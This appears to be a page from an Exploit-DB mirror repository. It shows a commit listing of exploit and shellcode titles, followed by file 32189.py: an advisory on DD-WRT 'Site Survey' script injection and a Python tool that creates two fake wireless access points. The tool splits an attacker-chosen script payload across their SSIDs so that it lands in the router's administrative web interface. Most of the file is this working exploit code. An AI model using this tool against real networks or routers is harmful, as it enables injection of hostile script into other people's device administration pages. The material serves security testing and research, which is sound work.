bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/32189.py
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

123 lines
No EOL
3.5 KiB
Python
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/30573/info
DD-WRT is prone to a script-injection vulnerability because it fails to adequately sanitize user-supplied data to the 'Site Survey' section of the administrative web interface.
Attackers can exploit this issue to execute arbitrary script code in the DD-WRT web interface.
Versions prior to DD-WRT 24-sp1 are vulnerable.
#!/usr/bin/env python
#
# This tool is distributed under a BSD licence. A copy of this
# should have been included with this file.
#
# Copyright (c) 2008, Rafael Dominguez Vega.
#
# This tool is designed for the purpose of performing security
# testing only and is not intended to be used for unlawful
# activities.
#
# This tool can be used to check for SSID script injection
vulnerabilities
# in different sofware products.
#
# Help can be viewed by running this file with --help.
#
#
# Author: Rafael Dominguez Vega
# Version: 0.0.2
#
# Further information: rafael ({dot}) dominguez-vega <(at)>
mwrinfosecurity {(dot)} com
#
import optparse
import sys
import os
import time
from optparse import OptionParser
class OptionParser (optparse.OptionParser):
def check_required (self, opt):
option = self.get_option(opt)
if getattr(self.values, option.dest) is None:
self.error("%s option not supplied" % option)
parser = OptionParser()
parser.add_option("-i", "--interface1", action="store",
dest="ap1",help="Network interface for first Access Point (required)")
parser.add_option("-j", "--interface2", action="store", dest="ap2",
help="Network interface for second Access Point (required)")
parser.add_option("-s", "--ssid1", action="store", dest="ssid1",
help="SSID for first Access Point. Between double quotes (\"\") if
special characters are used (required)")
parser.add_option("-t", "--ssid2", action="store", dest="ssid2",
help="SSID for second Access Point. Between double quotes (\"\") if
special characters are used (required)")
(options, args) = parser.parse_args()
parser.check_required("-i")
if options.ap1:
ap1 = options.ap1
else:
sys.exit(0)
parser.check_required("-j")
if options.ap2:
ap2 = options.ap2
else:
sys.exit(0)
parser.check_required("-s")
if options.ssid1:
ssid1 = options.ssid1
else:
sys.exit(0)
parser.check_required("-t")
if options.ssid2:
ssid2 = options.ssid2
else:
sys.exit(0)
ssid1 = ssid1.replace("<", "\<")
ssid1 = ssid1.replace(">","\>")
ssid1 = ssid1.replace("(","\(")
ssid1 = ssid1.replace(")","\)")
ssid1 = ssid1.replace("$","\$")
ssid1 = ssid1.replace("&","\&")
ssid1 = ssid1.replace(";","\;")
ssid1 = ssid1.replace("|","\|")
ssid1 = ssid1.replace("*","\*")
ssid1 = ssid1.replace(" ","\ ")
ssid2 = ssid2.replace("<", "\<")
ssid2 = ssid2.replace(">","\>")
ssid2 = ssid2.replace("(","\(")
ssid2 = ssid2.replace(")","\)")
ssid2 = ssid2.replace("$","\$")
ssid2 = ssid2.replace("&","\&")
ssid2 = ssid2.replace(";","\;")
ssid2 = ssid2.replace("|","\|")
ssid2 = ssid2.replace("*","\*")
ssid2 = ssid2.replace(" ","\ ")
os.system("wlanconfig "+ap1+" destroy")
os.system("wlanconfig "+ap2+" destroy")
print("\n Initialising fake APs...\n")
os.system("wlanconfig "+ap1+" create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig "+ap1+" essid "+ssid1)
time.sleep(2)
os.system("wlanconfig "+ap2+" create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig "+ap2+" essid "+ssid2)
print("Payload: "+ssid1+ssid2)
Reference in a new issue View git blame Copy permalink